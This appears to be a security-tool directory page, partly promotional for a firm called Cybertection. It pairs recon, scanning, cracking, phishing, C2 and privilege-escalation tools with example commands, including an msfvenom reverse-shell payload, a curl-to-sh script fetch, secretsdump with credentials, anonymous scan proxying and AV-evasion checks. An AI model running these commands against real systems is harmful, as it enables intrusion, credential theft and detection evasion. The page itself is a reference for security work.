16-Phase Tool Directory
Shodan
Search engine for internet-connected devices. Search for routers, servers, IoT devices, and public endpoints.
shodan search 'port:22 Country:US OS:Linux'Censys
Search engine for global network scans. Enables researchers to find hosts and certificates exposed on the public internet.
censys search 'services.port: 80 AND location.country: "United States"'crt.sh
Certificate Transparency log search tool. Discover subdomains and history of HTTPS certificates for any target domain.
curl -s 'https://crt.sh/?q=example.com&output=json' | jq .Whois
Lookup utility for domain ownership, registrar information, registration dates, and primary DNS servers.
whois target.comDNSDumpster
DNS recon and research utility to find subdomains, host records, mail servers, and generate visual network maps.
python dnsdumpster.py target.comThe Harvester
Gather emails, subdomains, hosts, employee names, open ports, and banners from different public sources.
theHarvester -d target.com -l 500 -b googleAmass
In-depth subdomain enumeration, DNS mapping, and infrastructure profiling using active and passive OSINT.
amass enum -passive -d target.comHave I Been Pwned
Search engine to check if your email address or phone number has been compromised in a public data breach archive.
curl -s https://haveibeenpwned.com/api/v3/breachedaccount/[email protected]Nmap
Network discovery and security auditing tool. Highly customizable port scanning, OS detection, and NSE scripting.
nmap -sS -sV -O -p- target.comMasscan
Fastest Internet port scanner. Transmits packets at speeds up to 10 million packets per second.
masscan -p1-65535 10.0.0.0/8 --rate 100000RustScan
Modern, lightning-fast port scanner written in Rust, designed to feed results directly into Nmap automatically.
rustscan -a target.com -- -sV -sCDirsearch
Advanced web path scanner using command-line brute force, supporting multi-threading and proxy configurations.
dirsearch -u https://target.com/ -e php,html,jsGobuster
Directory/file, DNS, and VHost brute-forcing tool written in Go for rapid structure discovery.
gobuster dir -u https://target.com -w common-words.txtFFuf
Fast web fuzzer written in Go. Ideal for directory discovery, parameter fuzzing, and headers injection testing.
ffuf -w wordlist.txt -u https://target.com/FUZZNessus
Enterprise-grade vulnerability scanner. Identifies misconfigurations, unpatched systems, and remote vulnerabilities.
Start Scan via Nessus Web UI (Port 8834)OpenVAS
Open-source vulnerability scanner and manager. Offers a rich feed of vulnerability tests updated daily.
gvm-start && xdg-open https://localhost:9392Nuclei
Fast, template-based vulnerability scanner that targets specific vulnerabilities with user-created YAML files.
nuclei -u https://target.com -t cves/Searchsploit
Command-line search utility for Exploit Database, allowing offline searches for known server vulnerabilities.
searchsploit 'Apache 2.4.41'Cybertection Web Scanner
Premium dynamic web application security scanning tool by Cybertection. Uncovers SQL Injection, XSS, and authorization leaks.
Access at cybertection.net -> Launch Security Assessment ConsoleBurp Suite
Standard web proxy for security professionals. Features intercepting proxy, repeater, intruder, and vulnerability scanner.
java -jar burpsuite_community.jarOWASP ZAP
Free, open-source web application scanner. Perfect for developers and automated CI/CD pipeline integration.
zaproxy -cmd -quickurl https://target.comSQLmap
Automated SQL injection tool. Detects and exploits SQL injection flaws, taking control of remote database servers.
sqlmap -u 'https://target.com/page.php?id=1' --dbs --batchCommix
Automated command injection exploitation framework. Detects and exploits OS command injection bugs in web forms.
commix --url='http://target.com/cmd.php?addr=INJECT_HERE'XSStrike
Advanced Cross-Site Scripting (XSS) scanner with payload generator, intelligent fuzzer, and DOM parser.
python xsstrike.py -u 'https://target.com/search?q=query'Hashcat
World's fastest GPU-accelerated password cracking utility. Supports MD5, SHA, bcrypt, NTLM, and hundreds of others.
hashcat -m 0 -a 0 hashes.txt wordlist.txtJohn the Ripper
Fast password cracker designed for Unix, Windows, and macOS. Auto-detects encryption hash types.
john --wordlist=passwords.txt hashes.txtCrackStation
Instant lookups against multi-billion pre-computed lookup tables for cryptographic hashes.
Paste hash directly into CrackStation Web GUI for instant lookupHydra
Parallelized network login cracker. Supports SSH, FTP, RDP, HTTP-POST, SMB, databases, and more.
hydra -l admin -P wordlist.txt target.com sshCeWL
Custom Wordlist Generator. Scrapes websites to compile custom dictionary files based on target terminology.
cewl -d 2 -m 5 -w wordlist.txt https://target.comAircrack-ng
Wi-Fi security assessment suite. Includes monitoring, packet capture, deauthentication, and WPA cracking.
aircrack-ng -w wordlist.txt capture-01.capAirgeddon
Multi-use wireless audit script. Automates captive portal generation, handshakes, and deauth loops.
sudo ./airgeddon.shWifite
Automated mass Wi-Fi auditor. Target all nearby WPA/WPA2 networks, capture handshakes, and attack WPS PINs.
sudo wifite --dict wordlist.txtBettercap
Complete, modular, and extensible framework for network monitoring, BLE spoofing, Wi-Fi sniffing, and MITM attacks.
sudo bettercap -eval "net.probe on; net.show"Flipper Zero
Portable multi-tool for sub-GHz radio signals, NFC, RFID, infrared, Bluetooth, and bad-USB payloads.
Deploy Sub-GHz replay attack or badUSB payload via hardware interfaceResponder
LLMNR, NBT-NS, and MDNS responder. Poisons network queries to capture domain hashes and authenticate requests.
sudo responder -I eth0 -w -d -FImpacket
Collection of Python classes for working with network protocols. Includes secretsdump, psexec, wmiexec, and kerberoast.
impacket-secretsdump domain.local/admin:[email protected]BloodHound
Active Directory relations visualizer. Maps pathways, access rights, and relationships to locate domain admin vectors.
sharpound.exe --CollectionMethod All --domain domain.localCrackMapExec
Swiss army knife for pentesting Active Directory. Automates mass credential testing and payload delivery over SMB/WinRM.
cme smb 10.10.10.0/24 -u user -p pass --local-authEvil-WinRM
Ultimate Windows Remote Management (WinRM) shell for hacking. Features memory script loads, bypasses, and file transfers.
evil-winrm -i 10.10.10.5 -u Administrator -p 'Password123'Metasploit
World's most used penetration testing framework. Contains thousands of modules, exploit tools, and target scanners.
msfconsole -qBeEF
Browser Exploitation Framework. Controls target web browsers to demonstrate client-side scripting attack vectors.
sudo ./beefSocial-Engineer Toolkit (SET)
Framework tailored for social engineering vectors. Clone target pages, host QR codes, and create weaponized PDF payloads.
sudo setoolkitMSFvenom
Metasploit standalone payload generator. Encodes, bypasses detection, and outputs payloads for multiple architectures.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.2 LPORT=4444 -f exe > shell.exeSliver C2
General purpose cross-platform implant and C2 framework. Features secure mTLS, WireGuard, and DNS tunnels.
sliver-server (starts console interface)Cobalt Strike
Commercial adversary simulation and red teaming platform. Generates advanced payloads and stable beaconing.
sudo ./teamserver 10.10.10.2 SuperSecretPassLinPEAS
Privilege escalation script for Linux. Highlights vulnerabilities, misconfigurations, and environment variables in green/red.
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shWinPEAS
Privilege escalation binary for Windows. Automates target configuration enumeration and prints quick privilege paths.
winPEASany.exe quiet cmdLigolo-ng
Next-gen network tunneling and pivoting tool. Establishes clean, high-performance interfaces on the attacker machine.
./agent -connect 10.10.10.2:11601 -ignore-certGoPhish
Enterprise phishing framework. Build email templates, manage user rosters, launch tests, and track link clicks.
sudo ./gophishEvilginx2
Man-in-the-middle phishing framework used for proxying login credentials and capturing multi-factor (MFA) session cookies.
sudo evilginx -p phishlets/Wifiphisher
Red team tool that mounts automated Wi-Fi social engineering attacks against WPA networks to harvest credentials.
sudo wifiphisher -aC evil-ap.htmlTempMail
Instant disposable secure email provider. Ideal for registering on untrusted platforms during target research.
Open temp-mail.org for immediate API mail generationGuerrillaMail
Temporary email system. Send and receive emails with custom addresses. Bypasses spam checks.
Access at guerrillamail.com10MinuteMail
Highly private disposable email address that self-destructs after exactly 10 minutes.
Access at 10minutemail.comGuardBot VPN & Antivirus
Cybertection LLC's premier endpoint protection agent. Integrates real-time VPN routing and AI malware prevention.
Launch Cybertection GuardBot AV -> Run Full System AuditVirusTotal
Aggregate file and URL scanner. Checks uploads against 70+ antivirus engines and domain blocklists.
vt-cli scan file.exeAntiscan.me
Private file scanner that checks target files against major AVs without sharing or submitting logs to vendors.
Upload artifact through Antiscan Web PortalCybertection AI Agents
Cybertection's signature security artificial intelligence. Audits networks, designs payloads, and manages endpoint security.
Access terminal console at cybertection.xyzGarak
Large Language Model vulnerability scanner. Analyzes models for prompt injection, hallucinations, and data leaks.
python3 -m garak --model_type openai --model_name gpt-4Promptfoo
Test application outputs, prompt safety, and model security constraints via rigorous CI assertion models.
promptfoo eval -p prompts.txt -r providers.txtVirtualBox
Free and open-source x86/AMD64 hypervisor. Crucial for running target networks and isolated attack suites.
VBoxManage startvm 'Kali-Linux-Lab'Docker
Lightweight application containment engine, perfect for spinning up target web servers or vulnerable databases.
docker run -d -p 80:80 vulnerable-web-appHackTheBox
Interactive online platform to test and practice penetration testing and vulnerability exploitation skills.
openvpn academy.ovpnCybertection Training Center
The core revenue driver of Cybertection. Comprehensive training on GuardBot products, system hacking, and cloud defense.
Syllabus available at /pdf/Cybertection_GuardBot_Course.pdfPortSwigger Academy
Free online security training for web applications. Tracks modern exploit techniques on real server structures.
Access Web Academy at portswigger.netOffSec OSCP Program
Offensive Security Certified Professional program. The industry standard for network and exploit testing.
Access courseware at offsec.comProxybot.win
API route finder and secure proxy gateway. Helps bypass IP rate limits and route scanning payloads anonymously.
curl -x 'http://proxybot.win:8080' https://target.com/apiVercel
Frontend developer platform. Instantly hosts lightweight static projects and serverless endpoints.
vercel deploy --prodCloudflare
Global CDN, secure reverse proxy, and enterprise DDoS shield. Protects target networks and filters scanning bots.
Configure rules via Cloudflare Dashboard